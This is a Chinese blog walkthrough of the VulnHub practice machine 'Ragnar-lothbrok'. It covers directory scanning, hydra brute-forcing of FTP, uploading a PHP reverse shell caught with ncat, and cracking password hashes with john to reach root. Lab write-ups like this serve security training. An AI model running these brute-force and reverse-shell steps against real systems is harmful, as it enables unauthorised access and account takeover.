vulnhub:Ragnar-lothbrok

最新推荐文章于 2024-05-13 14:35:53 发布
最新推荐文章于 2024-05-13 14:35:53 发布
阅读量448 收藏
点赞数
分类专栏: vulnhub靶场 文章标签: 渗透测试 web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45922278/article/details/114604052
版权

描述

Google && Wikipedia是您的朋友

难度:容易

当小猪知道公猪遭受了怎样的痛苦时,他们会如何尖叫

请添加/ etc / hosts-> ip vm + armbjorn

推特:@ArmBjorn

Virtualbox中工作。

获取root权限

目录

一、信息收集

1.nmap端口扫描

2.http服务目录扫描器

二、漏洞利用

2.爆破21端口ftp服务

三、getshell

1.登入ftp,上传php-reverse-shell

2.ncat 连接

四、提权

交互shell

john 爆破密码

五、总结

一、信息收集

1.nmap端口扫描

 

2.http服务目录扫描器

python3 dirsearch.py -u http://192.168.152.130 -e php

 

http://192.168.152.130/wordpress/

 

http://192.168.152.130//secret

 

二、漏洞利用

1.上面可能泄露了用户名账号。

下载secret,制作成密码字典

wget http://192.168.152.130/secret -O dir.txt

2.爆破21端口ftp服务

hydra -l ragnar -P dir.txt 192.168.152.130 ftp

三、getshell

1.登入ftp,上传php-reverse-shell

2.ncat 连接

ncat -lvp 1234

http://192.168.152.130/php-reverse-shell.php

 

 

四、提权

交互shell

python3 -c "import pty;pty.spawn('/bin/bash')"

 su ragnar

 

寻找敏感文件

 

john 爆破密码

john --wordlist=/usr/share/wordlists/rockyou.txt pass.txt

john --show pass.txt

 

切换root用户

root/kevinmitnick

 

 

五、总结

  • 爆破21端口ftp服务     hydra -l ragnar -P dir.txt 192.168.152.130 ftp
  • john 爆破密码   john --wordlist=/usr/share/wordlists/rockyou.txt pass.txt ; john --show pass.txt
New6ie
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ragnar:Ragnar git访问系统
05-15
要求 需要Nodejs 8 MongoDB 3.2 安装依赖项 npm install 源代码lint eslint用于加载javascript源代码: npm run lint 终点 POST / admin / login-管理员登录 POST / admin / users-通过admin保存用户,例如admin...
midgarts:WIP多平台Ragnarök在线MMORPG客户
04-03
Midgarts Midgarts Client是尝试编写旧经典游戏的现代客户端实现的尝试。 当前屏幕截图:目录简介(即将推出)介绍工具GRF资源管理器最新截图:例子加载GRF文件grfFilef , err := grf . Load ( "data.grf" )获得报名...
Vulnhub靶机渗透之环境搭建及JIS-CTF入门
qq_61702710的博客
07-15 2377
写道这里,这篇文章讲解完毕,后续会更深入的分享。netdiscover 用于发现目标ipnmap进行端口扫描dirb进行目录扫描敏感文件获取及分析php木马生成和蚁剑工具ssh远程连接sudo提权数据库脱裤相关内容整理于网上,侵权删。
看完这篇 教你玩转渗透测试靶机vulnhub——EvilBox-One
Aluxian_的博客
07-15 5435
Vulnhub靶机Web1渗透测试详解Vulnhub靶机介绍:Vulnhub靶机下载:Vulnhub靶机安装:Vulnhub靶机漏洞详解:①:信息收集: Vulnhub靶机介绍: vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。 老样子需要找到flag即可。 Vulnhub靶机下载: 官网地址:https://download.vulnhub.com/evilbox/EvilBox—One.ova
Vulnhub 靶机: ICA: 1
最新发布
weixin_69670995的博客
05-13 962
进入root目录,查看root.txt文件,这里我使用的是tac命令查看的root.txt文件,因为使用cat命令,会直接执行我们伪造的cat程序,所有我使用的是tac命令,也可以将我们伪造的cat程序删除,就可以使用cat命令执行了。扫描出来的东西很多,使用浏览器访问一下目录,没有什么有用的信息,查看一下首页的源代码,也没有什么有用的信息,一时间没有什么思路,在页面上看到是"qdPM9.2"框架,查看一下kali上有没有这个框架的漏洞。发现开着22,80,3360,使用浏览器访问80端口。
看完这篇 教你玩转渗透测试靶机vulnhub—Corrosion:2
Aluxian_的博客
06-26 1166
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。这是一个漏洞靶机,老样子需要找到flag即可。Medium这个靶机难度中偏上 因为比较麻烦1.信息收集获取ip地址 和端口信息web等 查看F12源码信息2.文件包含漏洞,包含日志文件ssh写入木马ssh ''@靶机(新知识点!3.nc反弹shell(这里要使用url编码)zip2john爆破和fcrackzip。
全网最详细的渗透测试靶机实操步骤——vulnhub靶机实战(一)Tr0ll
hyjcking的博客
11-20 2034
超级详细的步骤,希望可以为你解决这台靶机提供思路 说实话这个靶机不算难,但是却能比较好的巩固自己的基础知识,期间也遇到了自己不太懂的知识,会做和做的快是有区别的,在渗透这条路上还是任重而道远呐,继续加油
Vulnhub靶机笔记01——Billu_b0x
2301_76329510的博客
04-16 1270
test。
awesome-pion:精选与Pion相关的令人敬畏的事物
05-13
很棒的介子 精选与Pion相关的令人敬畏的事物 资源 社区 官方常见问题 官方Slack频道 ... Ragnar-H / TelloGo Deepch / RTSPtoWebRTC giongto35 / cloud-game kdevb0x / quikface 机械加工/我的家 dialup-i
kcmsystemd:KDE的系统控制模块
06-13
Kcmsystemd KDE 的 Systemd 控制模块。 为 systemd 守护进程提供图形前端,允许查看和控制 systemd 单元,以及修改配置文件。 集成在 KDE 的系统设置对话框中。... 开发者:Ragnar Thomsen ( ) 网址: :
ragnaroek-midgard-php5
07-06
在IT行业中,通常这样的命名结构可能是为了纪念北欧神话中的元素,比如“Ragnarök”是北欧神话中的末日之战,“Midgard”则代表人类居住的世界。在软件开发中,开发者有时会用神话故事或角色来命名他们的项目,以...
Vulnhub靶机:aMaze
qq_48904485的博客
01-07 426
运行环境:Virtualbox攻击机:kali(10.0.2.15)靶机:aMaze(10.0.2.9)目标:获取靶机root权限和flag靶机下载地址:https://www.vulnhub.com/entry/amaze-1,573/
Vulnhub靶机-Prime1
m0_74855736的博客
03-08 995
前面目录扫描可以发现有使用WordPress,现在又获得一个密码,这边尝试wpscan去获得一个用户再配合刚刚获得的一个密码。ls #/home目录在Linux称为主目录,在该目录下面存储的是每个用户的目录。从右侧的页面一个个找php页面且带有提交按钮的,这个目录就是有写权限的。根据前面提示对获得的两个php文件参数的模糊测试,最终在index.php获得一个正确的参数是file。主题编辑器,一般来说从主题编辑器容易有有写权限的一些目录,通过遍历来看看哪些目录有写权限。
Ragnar-lothbrok靶机总结
qq_45301512的博客
01-29 553
靶机下载地址:打开靶机,使用nmap扫描出靶机的ip和所有开放的端口可以看到靶机开放了21端口,80端口,443端口,3306端口一般开放21端口,我们可以先尝试ftp的匿名登录可以看到并不能使用ftp的匿名登录紧接着从网站入手,根据80端口打开网站网站上并不能发现漏洞利用点信息收集,目录爆破一波发现了一个secret文件,里面存放密码字典并且还有个wordpress目录,打开了新网站,发现了一个用户名。
Vulnhub】搭建Vulnhub靶机
zg_111的博客
03-28 8835
Vulnhub它是一个提供各种网络攻防靶场的平台,里面大部分的环境是要用VMware或者VirtualBox打开运行的。
看完这篇 教你玩转渗透测试靶机vulnhub—Emplre: Lupinone
Aluxian_的博客
06-23 1132
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。这是一个漏洞靶机,老样子需要找到flag即可。Medium这个靶机难度比较简单1.信息收集获取ip地址 和端口信息web等 查看F12源码信息‘2.enum4linux工具得使用(新知识点)用于账号枚举Brainfuck编码(经常做ctf得肯定知道)3.nc bash反弹命令(经常做渗透得话这一条肯定要背下来得,不然每次看命令没有提升。
Vulnhub靶机: DarkHole
sszsNo1的博客
07-02 166
Vulnhub靶机: DarkHole如何打靶
vulnhub靶场之RAGNAR LOTHBROK: 1
weixin_42478365的博客
05-29 717
wordpress用户登录爆破,ftp用户密码爆破,john爆破hash密码
ragnar's story is true or is just a myth?
03-28
As an AI language model, I cannot determine if Ragnar's story is true or just a myth as there is no concrete evidence to support either claim. Ragnar is a figure from Norse mythology, and while some ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值